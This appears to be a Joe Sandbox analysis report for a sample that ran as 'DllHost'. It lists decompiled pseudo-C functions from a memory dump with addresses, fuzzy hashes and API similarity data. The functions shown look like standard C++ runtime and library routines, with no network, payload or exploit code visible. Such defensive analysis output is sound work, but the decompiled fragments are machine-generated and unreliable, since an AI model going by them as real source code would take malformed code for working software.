                                                                                                                                                              0x7ff7191e9483
                                                                                                                                                              0x7ff7191e9487
                                                                                                                                                              0x7ff7191e9499
                                                                                                                                                              0x7ff7191e94a2
                                                                                                                                                              0x7ff7191e94a5
                                                                                                                                                              0x7ff7191e94ad
                                                                                                                                                              0x7ff7191e94af
                                                                                                                                                              0x7ff7191e94b9
                                                                                                                                                              0x7ff7191e94bb
                                                                                                                                                              0x7ff7191e94dc

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                              • String ID: -$e+000$gfff
                                                                                                                                                              • API String ID: 3215553584-2620144452
                                                                                                                                                              • Opcode ID: 58cdb031105c543d41c417ef2e260b333795cfb18faa66ef8bcf0c9f98777dc0
                                                                                                                                                              • Instruction ID: c27451d8b2dac8449c13b42f206042656429442f301f14321260888e87b23de7
                                                                                                                                                              • Opcode Fuzzy Hash: 58cdb031105c543d41c417ef2e260b333795cfb18faa66ef8bcf0c9f98777dc0
                                                                                                                                                              • Instruction Fuzzy Hash: 09513D72B18BC146F7119F25A840369EBA2EB41BA4F889231D75C47BD5CE2CD089D710
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191BD010 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 112COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 73%
                                                                                                                                                              			E00007FF77FF7191BD010(long long __rax, long long __rbx, long long* __rcx, void* __rdx, long long __rsi) {
				void* _t49;
				intOrPtr _t74;
				void* _t87;
				long long* _t88;
				long long _t91;
				void* _t93;
				void* _t94;
				void* _t96;
				long long _t100;

				_t65 = __rax;
				 *((long long*)(_t96 + 0x10)) = __rbx;
				 *((long long*)(_t96 + 0x18)) = __rsi;
				_t94 = _t96 - 0x47;
				_t88 = __rcx;
				if (__rcx == 0) goto 0x191bd15a;
				if ( *__rcx != 0) goto 0x191bd15a;
				E00007FF77FF7191D23D8(__rax, __rcx);
				_t91 = __rax;
				 *((long long*)(_t94 + 0x67)) = __rax;
				_t74 =  *((intOrPtr*)(__rdx + 8));
				if (_t74 == 0) goto 0x191bd06c;
				if ( *((intOrPtr*)(_t74 + 0x28)) != 0) goto 0x191bd073;
				goto 0x191bd073;
				E00007FF77FF7191D0D0C(0, _t94 - 0x29);
				r14d = 0;
				 *((long long*)(_t94 - 0x21)) = _t100;
				 *((intOrPtr*)(_t94 - 0x19)) = r14b;
				 *((long long*)(_t94 - 0x11)) = _t100;
				 *((intOrPtr*)(_t94 - 9)) = r14b;
				 *((long long*)(_t94 - 1)) = _t100;
				 *((intOrPtr*)(_t94 + 7)) = r14w;
				 *((long long*)(_t94 + 0xf)) = _t100;
				 *((intOrPtr*)(_t94 + 0x17)) = r14w;
				 *((long long*)(_t94 + 0x1f)) = _t100;
				 *((intOrPtr*)(_t94 + 0x27)) = r14b;
				 *((long long*)(_t94 + 0x2f)) = _t100;
				 *((intOrPtr*)(_t94 + 0x37)) = r14b;
				if (0x1920f71b == 0) goto 0x191bd177;
				E00007FF77FF7191D12B8(_t65, 0x1920f71b, _t94 - 0x29, 0x1920f71b);
				 *((intOrPtr*)(_t91 + 8)) = r14d;
				 *_t91 = 0x191f9a28;
				 *_t88 = _t91;
				E00007FF77FF7191D1324(_t94 - 0x29);
				if ( *((intOrPtr*)(_t94 + 0x2f)) == 0) goto 0x191bd0f2;
				E00007FF77FF7191D9C88(0x10, 0, 0x1920f71b, 0x1920f71b, _t100);
				 *((long long*)(_t94 + 0x2f)) = _t100;
				if ( *((intOrPtr*)(_t94 + 0x1f)) == 0) goto 0x191bd104;
				E00007FF77FF7191D9C88(0x10, 0, 0x1920f71b, 0x1920f71b, _t87);
				 *((long long*)(_t94 + 0x1f)) = _t100;
				if ( *((intOrPtr*)(_t94 + 0xf)) == 0) goto 0x191bd116;
				E00007FF77FF7191D9C88(0x10, 0, 0x1920f71b, 0x1920f71b, _t93);
				 *((long long*)(_t94 + 0xf)) = _t100;
				if ( *((intOrPtr*)(_t94 - 1)) == 0) goto 0x191bd128;
				E00007FF77FF7191D9C88(0x10, 0, 0x1920f71b, 0x1920f71b);
				 *((long long*)(_t94 - 1)) = _t100;
				if ( *((intOrPtr*)(_t94 - 0x11)) == 0) goto 0x191bd13a;
				E00007FF77FF7191D9C88(0x10, 0, 0x1920f71b, 0x1920f71b);
				 *((long long*)(_t94 - 0x11)) = _t100;
				if ( *((intOrPtr*)(_t94 - 0x21)) == 0) goto 0x191bd14c;
				_t49 = E00007FF77FF7191D9C88(0x10, 0, 0x1920f71b, 0x1920f71b);
				 *((long long*)(_t94 - 0x21)) = _t100;
				E00007FF77FF7191D0D84(_t49, _t94 - 0x29);
				return 2;
			}












                                                                                                                                                              0x7ff7191bd010
                                                                                                                                                              0x7ff7191bd010
                                                                                                                                                              0x7ff7191bd015
                                                                                                                                                              0x7ff7191bd01e
                                                                                                                                                              0x7ff7191bd02d
                                                                                                                                                              0x7ff7191bd033
                                                                                                                                                              0x7ff7191bd03d
                                                                                                                                                              0x7ff7191bd048
                                                                                                                                                              0x7ff7191bd04d
                                                                                                                                                              0x7ff7191bd050
                                                                                                                                                              0x7ff7191bd054
                                                                                                                                                              0x7ff7191bd05b
                                                                                                                                                              0x7ff7191bd064
                                                                                                                                                              0x7ff7191bd06a
                                                                                                                                                              0x7ff7191bd079
                                                                                                                                                              0x7ff7191bd07f
                                                                                                                                                              0x7ff7191bd082
                                                                                                                                                              0x7ff7191bd086
                                                                                                                                                              0x7ff7191bd08a
                                                                                                                                                              0x7ff7191bd08e
                                                                                                                                                              0x7ff7191bd092
                                                                                                                                                              0x7ff7191bd096
                                                                                                                                                              0x7ff7191bd09b
                                                                                                                                                              0x7ff7191bd09f
                                                                                                                                                              0x7ff7191bd0a4
                                                                                                                                                              0x7ff7191bd0a8
                                                                                                                                                              0x7ff7191bd0ac
                                                                                                                                                              0x7ff7191bd0b0
                                                                                                                                                              0x7ff7191bd0b7
                                                                                                                                                              0x7ff7191bd0c4
                                                                                                                                                              0x7ff7191bd0ca
                                                                                                                                                              0x7ff7191bd0d5
                                                                                                                                                              0x7ff7191bd0d8
                                                                                                                                                              0x7ff7191bd0df
                                                                                                                                                              0x7ff7191bd0eb
                                                                                                                                                              0x7ff7191bd0ed
                                                                                                                                                              0x7ff7191bd0f2
                                                                                                                                                              0x7ff7191bd0fd
                                                                                                                                                              0x7ff7191bd0ff
                                                                                                                                                              0x7ff7191bd104
                                                                                                                                                              0x7ff7191bd10f
                                                                                                                                                              0x7ff7191bd111
                                                                                                                                                              0x7ff7191bd116
                                                                                                                                                              0x7ff7191bd121
                                                                                                                                                              0x7ff7191bd123
                                                                                                                                                              0x7ff7191bd128
                                                                                                                                                              0x7ff7191bd133
                                                                                                                                                              0x7ff7191bd135
                                                                                                                                                              0x7ff7191bd13a
                                                                                                                                                              0x7ff7191bd145
                                                                                                                                                              0x7ff7191bd147
                                                                                                                                                              0x7ff7191bd14c
                                                                                                                                                              0x7ff7191bd154
                                                                                                                                                              0x7ff7191bd176

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: std::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                                                                              • String ID: bad locale name
                                                                                                                                                              • API String ID: 2775327233-1405518554
                                                                                                                                                              • Opcode ID: 9d9f66dbe93ed1850866d092d48db1ed2660229b655a0539cc4309bc79259124
                                                                                                                                                              • Instruction ID: 660dd2707f206c67b8f1de017d0c3eb46bdf1ba1d5488a063f8cff308d6f7815
                                                                                                                                                              • Opcode Fuzzy Hash: 9d9f66dbe93ed1850866d092d48db1ed2660229b655a0539cc4309bc79259124
                                                                                                                                                              • Instruction Fuzzy Hash: 1E414D36B06E4189FB14EF70E4902EC62B5EF4476CF840035DA4E26A55CE38D56BE365
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191B2B00 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 71COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00007FF77FF7191B2B00(void* __eax, signed int __edx, void* __eflags, void* __rcx) {

				 *(__rcx + 0x10) = __edx & 0x00000017;
				if (__eflags == 0) goto 0x191b2b16;
				if (r8b == 0) goto 0x191b2b25;
				goto 0x191b2b1b;
				return __eax;
			}



                                                                                                                                                              0x7ff7191b2b07
                                                                                                                                                              0x7ff7191b2b0d
                                                                                                                                                              0x7ff7191b2b12
                                                                                                                                                              0x7ff7191b2b14
                                                                                                                                                              0x7ff7191b2b1a

                                                                                                                                                              APIs
                                                                                                                                                              • __std_exception_copy.LIBVCRUNTIME ref: 00007FF7191B2BB8
                                                                                                                                                                • Part of subcall function 00007FF7191D41CC: RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,7FFFFFFFFFFFFFFF,00007FF7191D0F5E), ref: 00007FF7191D4210
                                                                                                                                                                • Part of subcall function 00007FF7191D41CC: _purecall.KERNELBASE(?,?,?,?,?,?,?,?,7FFFFFFFFFFFFFFF,00007FF7191D0F5E), ref: 00007FF7191D4256
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FileHeader__std_exception_copy_purecall
                                                                                                                                                              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                              • API String ID: 1930782590-1866435925
                                                                                                                                                              • Opcode ID: e082dd76537d9d62ea19e467e1bc7f36a70a4156b6ab080c13c5a4184de4e153
                                                                                                                                                              • Instruction ID: 13268b7f1c7d2913335b72eb39ff0b7b36ce70509f234760895b80e8549bbaf9
                                                                                                                                                              • Opcode Fuzzy Hash: e082dd76537d9d62ea19e467e1bc7f36a70a4156b6ab080c13c5a4184de4e153
                                                                                                                                                              • Instruction Fuzzy Hash: E421D122A18F4691FA04AF11E9811E9B332FB64758FD88531DA4D026A5EF3CE69EC750
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191F3C14 Relevance: 6.2, APIs: 4, Instructions: 159COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 87%
                                                                                                                                                              			E00007FF77FF7191F3C14(signed int __edx, void* __eflags, intOrPtr* __rax, long long __rbx, signed char* __rcx, long long __rbp, long long _a8, char _a16, long long _a24) {
				signed int _t43;
				signed int _t55;
				signed int _t57;
				signed int _t73;
				void* _t96;
				signed int _t106;

				_a8 = __rbx;
				_a24 = __rbp;
				 *__rcx = 0;
				r14d = r9d;
				_t73 = __edx;
				if (__eflags == 0) goto 0x191f3c89;
				if (__eflags == 0) goto 0x191f3c65;
				if ((__edx & 0x00000003) - 1 == 1) goto 0x191f3c5e;
				E00007FF77FF7191DC854(__rax);
				 *__rax = 0x16;
				E00007FF77FF7191DA5D8();
				goto 0x191f3c8e;
				goto 0x191f3c8e;
				asm("sbb ecx, ecx");
				goto 0x191f3c8e;
				__rcx[4] = 0x80000000;
				_t43 = _t73 & 0x00000700;
				if ((dil & 0x00000008) == 0) goto 0x191f3cfd;
				if (_t43 == 0x100) goto 0x191f3cf6;
				if (_t43 == 0x200) goto 0x191f3cef;
				if (_t43 == 0x300) goto 0x191f3ce8;
				if (_t43 == 0x400) goto 0x191f3cfd;
				if (_t43 == 0x500) goto 0x191f3ce1;
				if (_t43 == 0x600) goto 0x191f3cef;
				_t96 = _t43 - 0x700;
				if (_t96 == 0) goto 0x191f3ce1;
				E00007FF77FF7191DC854(__rax);
				 *__rax = 0x16;
				E00007FF77FF7191DA5D8();
				goto 0x191f3d02;
				goto 0x191f3d02;
				goto 0x191f3d02;
				goto 0x191f3d02;
				goto 0x191f3d02;
				__rcx[8] = 3;
				if (_t96 == 0) goto 0x191f3d53;
				if (_t96 == 0) goto 0x191f3d4c;
				if (_t96 == 0) goto 0x191f3d45;
				if (_t96 == 0) goto 0x191f3d3e;
				if (r8d - 0xffffffffffffffe0 == 0x40) goto 0x191f3d30;
				E00007FF77FF7191DC854(__rax);
				 *__rax = 0x16;
				E00007FF77FF7191DA5D8();
				goto 0x191f3d55;
				sil = __rcx[4] == 0x80000000;
				goto 0x191f3d55;
				goto 0x191f3d55;
				goto 0x191f3d55;
				goto 0x191f3d55;
				__rcx[0x14] = __rcx[0x14] & 0x00000000;
				__rcx[0xc] = 0;
				__rcx[0x10] = 0x80;
				if (dil >= 0) goto 0x191f3d6b;
				 *__rcx =  *__rcx | 0x00000010;
				if ((0x00008000 & _t73) != 0) goto 0x191f3d93;
				if ((_t73 & 0x00074000) != 0) goto 0x191f3d90;
				if (E00007FF77FF7191E2B1C(__rax,  &_a16) != 0) goto 0x191f3e08;
				if (_a16 == 0x8000) goto 0x191f3d93;
				 *__rcx =  *__rcx | 0x00000080;
				if ((0x00000100 & _t73) == 0) goto 0x191f3db2;
				_t55 =  *0x1921be38; // 0x0
				_t57 =  !_t55 & r14d;
				if (_t57 < 0) goto 0x191f3db2;
				__rcx[0x10] = 1;
				_t106 = dil & 0x00000040;
				if (_t106 == 0) goto 0x191f3dc6;
				asm("bts dword [ebx+0x14], 0x1a");
				asm("bts dword [ebx+0x4], 0x10");
				__rcx[0xc] = __rcx[0xc] | 0x00000004;
				asm("bt edi, 0xc");
				if (_t106 >= 0) goto 0x191f3dcf;
				__rcx[0x10] = __rcx[0x10] | 0x00000100;
				asm("bt edi, 0xd");
				if (_t106 >= 0) goto 0x191f3dda;
				asm("bts dword [ebx+0x14], 0x19");
				if ((dil & 0x00000020) == 0) goto 0x191f3de7;
				asm("bts dword [ebx+0x14], 0x1b");
				goto 0x191f3df2;
				if ((dil & 0x00000010) == 0) goto 0x191f3df2;
				asm("bts dword [ebx+0x14], 0x1c");
				return _t57;
			}









                                                                                                                                                              0x7ff7191f3c14
                                                                                                                                                              0x7ff7191f3c19
                                                                                                                                                              0x7ff7191f3c29
                                                                                                                                                              0x7ff7191f3c2e
                                                                                                                                                              0x7ff7191f3c34
                                                                                                                                                              0x7ff7191f3c3e
                                                                                                                                                              0x7ff7191f3c43
                                                                                                                                                              0x7ff7191f3c48
                                                                                                                                                              0x7ff7191f3c4a
                                                                                                                                                              0x7ff7191f3c4f
                                                                                                                                                              0x7ff7191f3c55
                                                                                                                                                              0x7ff7191f3c5c
                                                                                                                                                              0x7ff7191f3c63
                                                                                                                                                              0x7ff7191f3c79
                                                                                                                                                              0x7ff7191f3c87
                                                                                                                                                              0x7ff7191f3c90
                                                                                                                                                              0x7ff7191f3c98
                                                                                                                                                              0x7ff7191f3c9a
                                                                                                                                                              0x7ff7191f3ca1
                                                                                                                                                              0x7ff7191f3ca8
                                                                                                                                                              0x7ff7191f3caf
                                                                                                                                                              0x7ff7191f3cb6
                                                                                                                                                              0x7ff7191f3cbd
                                                                                                                                                              0x7ff7191f3cc4
                                                                                                                                                              0x7ff7191f3cc6
                                                                                                                                                              0x7ff7191f3cc8
                                                                                                                                                              0x7ff7191f3cca
                                                                                                                                                              0x7ff7191f3ccf
                                                                                                                                                              0x7ff7191f3cd5
                                                                                                                                                              0x7ff7191f3cdf
                                                                                                                                                              0x7ff7191f3ce6
                                                                                                                                                              0x7ff7191f3ced
                                                                                                                                                              0x7ff7191f3cf4
                                                                                                                                                              0x7ff7191f3cfb
                                                                                                                                                              0x7ff7191f3d02
                                                                                                                                                              0x7ff7191f3d08
                                                                                                                                                              0x7ff7191f3d0d
                                                                                                                                                              0x7ff7191f3d12
                                                                                                                                                              0x7ff7191f3d17
                                                                                                                                                              0x7ff7191f3d1c
                                                                                                                                                              0x7ff7191f3d1e
                                                                                                                                                              0x7ff7191f3d23
                                                                                                                                                              0x7ff7191f3d29
                                                                                                                                                              0x7ff7191f3d2e
                                                                                                                                                              0x7ff7191f3d38
                                                                                                                                                              0x7ff7191f3d3c
                                                                                                                                                              0x7ff7191f3d43
                                                                                                                                                              0x7ff7191f3d4a
                                                                                                                                                              0x7ff7191f3d51
                                                                                                                                                              0x7ff7191f3d55
                                                                                                                                                              0x7ff7191f3d59
                                                                                                                                                              0x7ff7191f3d5c
                                                                                                                                                              0x7ff7191f3d66
                                                                                                                                                              0x7ff7191f3d68
                                                                                                                                                              0x7ff7191f3d72
                                                                                                                                                              0x7ff7191f3d7a
                                                                                                                                                              0x7ff7191f3d88
                                                                                                                                                              0x7ff7191f3d8e
                                                                                                                                                              0x7ff7191f3d90
                                                                                                                                                              0x7ff7191f3d9a
                                                                                                                                                              0x7ff7191f3d9c
                                                                                                                                                              0x7ff7191f3da4
                                                                                                                                                              0x7ff7191f3da9
                                                                                                                                                              0x7ff7191f3dab
                                                                                                                                                              0x7ff7191f3db2
                                                                                                                                                              0x7ff7191f3db6
                                                                                                                                                              0x7ff7191f3db8
                                                                                                                                                              0x7ff7191f3dbd
                                                                                                                                                              0x7ff7191f3dc2
                                                                                                                                                              0x7ff7191f3dc6
                                                                                                                                                              0x7ff7191f3dca
                                                                                                                                                              0x7ff7191f3dcc
                                                                                                                                                              0x7ff7191f3dcf
                                                                                                                                                              0x7ff7191f3dd3
                                                                                                                                                              0x7ff7191f3dd5
                                                                                                                                                              0x7ff7191f3dde
                                                                                                                                                              0x7ff7191f3de0
                                                                                                                                                              0x7ff7191f3de5
                                                                                                                                                              0x7ff7191f3deb
                                                                                                                                                              0x7ff7191f3ded
                                                                                                                                                              0x7ff7191f3e07

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _invalid_parameter_noinfo$_get_daylight
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 72036449-0
                                                                                                                                                              • Opcode ID: 4610346081526dcf44df376283f073f6da23373f9772cc5f0d4d4299c8234037
                                                                                                                                                              • Instruction ID: 8f81987d1fbfa4e470e0637af506050e0b35c5b9eb3b66249de023671f794cca
                                                                                                                                                              • Opcode Fuzzy Hash: 4610346081526dcf44df376283f073f6da23373f9772cc5f0d4d4299c8234037
                                                                                                                                                              • Instruction Fuzzy Hash: 7B51B322D08A0A42F7657D28B005379E5A0AB407BCFD94035CB5E466D5EE2CE8CFB671
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191B1410 Relevance: 6.1, APIs: 4, Instructions: 126COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 21%
                                                                                                                                                              			E00007FF77FF7191B1410(long long __rbx, signed long long __rcx, void* __rdx, void* __r8) {
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* _t37;
				void* _t39;
				signed long long _t50;
				signed long long _t51;
				long long* _t65;
				void* _t85;
				intOrPtr _t86;
				intOrPtr _t90;
				void* _t93;
				signed long long _t94;
				void* _t96;
				void* _t99;
				void* _t100;
				void* _t102;

				_t105 = __r8;
				 *((long long*)(_t102 + 0x20)) = __rbx;
				_t100 = _t102 - 0x47;
				_t50 =  *0x192190a0; // 0x590452ce5669
				_t51 = _t50 ^ _t102 - 0x000000a0;
				 *(_t100 + 0x37) = _t51;
				_t97 = __rdx;
				_t65 = __rcx;
				 *(_t100 - 0x39) = __rcx;
				E00007FF77FF7191B9E00(_t51, __rcx, _t100 - 0x11, __r8, __rdx);
				_t94 = _t51;
				 *(_t100 - 0x39) = _t51;
				asm("movups xmm0, [esi]");
				asm("movaps [ebp+0x17], xmm0");
				if ( *((long long*)(_t51 + 0x10)) == 0) goto 0x191b1472;
				r8d = 2;
				E00007FF77FF7191BAB00(_t65, _t51, _t97, _t105, _t93);
				r8d =  *((intOrPtr*)(_t100 + 0x17));
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t100 + 0x1f)))) + 0x10))(_t99);
				_t85 =  >=  ?  *((void*)(_t100 + 0x17)) : _t100 + 0x17;
				E00007FF77FF7191BAB00(_t65, _t94, _t97,  *((intOrPtr*)(_t100 + 0x27)), _t96);
				_t86 =  *((intOrPtr*)(_t100 + 0x2f));
				if (_t86 - 0x10 < 0) goto 0x191b14db;
				if (_t86 + 1 - 0x1000 < 0) goto 0x191b14d6;
				if ( *((intOrPtr*)(_t100 + 0x17)) -  *((intOrPtr*)( *((intOrPtr*)(_t100 + 0x17)) - 8)) + 0xfffffff8 - 0x1f > 0) goto 0x191b15aa;
				0x191d23d0();
				asm("movups xmm0, [edi]");
				asm("movups [ebp-0x31], xmm0");
				asm("movups xmm1, [edi+0x10]");
				asm("movups [ebp-0x21], xmm1");
				 *((long long*)(_t94 + 0x10)) = 0;
				 *((long long*)(_t94 + 0x18)) = 0xf;
				 *_t94 = 0;
				_t57 =  >=  ?  *((void*)(_t100 - 0x31)) : _t100 - 0x31;
				 *_t65 = 0x191f95f0;
				asm("xorps xmm0, xmm0");
				asm("movups [edx], xmm0");
				 *((long long*)(_t100 + 0x17)) =  >=  ?  *((void*)(_t100 - 0x31)) : _t100 - 0x31;
				 *((char*)(_t100 + 0x1f)) = 1;
				_t37 = E00007FF77FF7191D3F88(_t65, _t100 + 0x17, _t65 + 8, _t94, _t97);
				 *_t65 = 0x191f9638;
				_t90 =  *((intOrPtr*)(_t100 - 0x19));
				if (_t90 - 0x10 < 0) goto 0x191b1571;
				if (_t90 + 1 - 0x1000 < 0) goto 0x191b156c;
				if ( *((intOrPtr*)(_t100 - 0x31)) -  *((intOrPtr*)( *((intOrPtr*)(_t100 - 0x31)) - 8)) + 0xfffffff8 - 0x1f > 0) goto 0x191b15a4;
				0x191d23d0();
				 *_t65 = 0x191f9650;
				asm("movups xmm0, [esi]");
				asm("movups [ebx+0x18], xmm0");
				return E00007FF77FF7191D23B0(_t37, _t39,  *(_t100 + 0x37) ^ _t102 - 0x000000a0);
			}




















                                                                                                                                                              0x7ff7191b1410
                                                                                                                                                              0x7ff7191b1410
                                                                                                                                                              0x7ff7191b1418
                                                                                                                                                              0x7ff7191b1424
                                                                                                                                                              0x7ff7191b142b
                                                                                                                                                              0x7ff7191b142e
                                                                                                                                                              0x7ff7191b1432
                                                                                                                                                              0x7ff7191b1435
                                                                                                                                                              0x7ff7191b1438
                                                                                                                                                              0x7ff7191b1443
                                                                                                                                                              0x7ff7191b1448
                                                                                                                                                              0x7ff7191b144b
                                                                                                                                                              0x7ff7191b144f
                                                                                                                                                              0x7ff7191b1452
                                                                                                                                                              0x7ff7191b145b
                                                                                                                                                              0x7ff7191b145d
                                                                                                                                                              0x7ff7191b146d
                                                                                                                                                              0x7ff7191b1479
                                                                                                                                                              0x7ff7191b1481
                                                                                                                                                              0x7ff7191b148e
                                                                                                                                                              0x7ff7191b149a
                                                                                                                                                              0x7ff7191b14a0
                                                                                                                                                              0x7ff7191b14a8
                                                                                                                                                              0x7ff7191b14bb
                                                                                                                                                              0x7ff7191b14d0
                                                                                                                                                              0x7ff7191b14d6
                                                                                                                                                              0x7ff7191b14db
                                                                                                                                                              0x7ff7191b14de
                                                                                                                                                              0x7ff7191b14e2
                                                                                                                                                              0x7ff7191b14e6
                                                                                                                                                              0x7ff7191b14ea
                                                                                                                                                              0x7ff7191b14f2
                                                                                                                                                              0x7ff7191b14fa
                                                                                                                                                              0x7ff7191b1506
                                                                                                                                                              0x7ff7191b1512
                                                                                                                                                              0x7ff7191b1519
                                                                                                                                                              0x7ff7191b151c
                                                                                                                                                              0x7ff7191b151f
                                                                                                                                                              0x7ff7191b1523
                                                                                                                                                              0x7ff7191b152b
                                                                                                                                                              0x7ff7191b1537
                                                                                                                                                              0x7ff7191b153a
                                                                                                                                                              0x7ff7191b1542
                                                                                                                                                              0x7ff7191b1555
                                                                                                                                                              0x7ff7191b156a
                                                                                                                                                              0x7ff7191b156c
                                                                                                                                                              0x7ff7191b1578
                                                                                                                                                              0x7ff7191b157b
                                                                                                                                                              0x7ff7191b157e
                                                                                                                                                              0x7ff7191b15a3

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _invalid_parameter_noinfo_noreturn$__std_exception_copy__std_exception_destroy
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2138705365-0
                                                                                                                                                              • Opcode ID: 1de77ace97c1923a312f6e6869c70dfe0d6ed9907d4ed3d17b7b5fd0b108935b
                                                                                                                                                              • Instruction ID: 4c84d7364badae7644f8a9ce882edaa74c81e3d72421a35f7af7852117484f2b
                                                                                                                                                              • Opcode Fuzzy Hash: 1de77ace97c1923a312f6e6869c70dfe0d6ed9907d4ed3d17b7b5fd0b108935b
                                                                                                                                                              • Instruction Fuzzy Hash: B0518E22B04E4589FB00EF29E4543EC6372EB497ACF805631EA5D02B99EF78D5DAC350
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191D0820 Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
